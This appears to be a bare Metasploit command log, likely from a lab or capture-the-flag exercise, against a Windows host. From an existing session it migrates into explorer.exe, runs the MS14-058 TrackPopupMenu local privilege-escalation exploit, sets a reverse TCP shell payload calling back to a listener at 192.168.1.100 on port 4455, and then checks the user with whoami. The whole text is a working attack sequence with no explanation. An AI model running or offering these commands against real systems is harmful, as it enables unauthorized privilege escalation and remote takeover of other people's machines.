sessions -i 1
run migrate -n explorer.exe
getuid 【win-u8oiu3qm15c\whale】
background
use exploit/windows/local/ms14_058_track_popup_menu
show options
set session 1
show target
set target 1
set payload generic/shell_reverse_tcp
set lhost 192.168.1.100
set lport 4455
run
whoami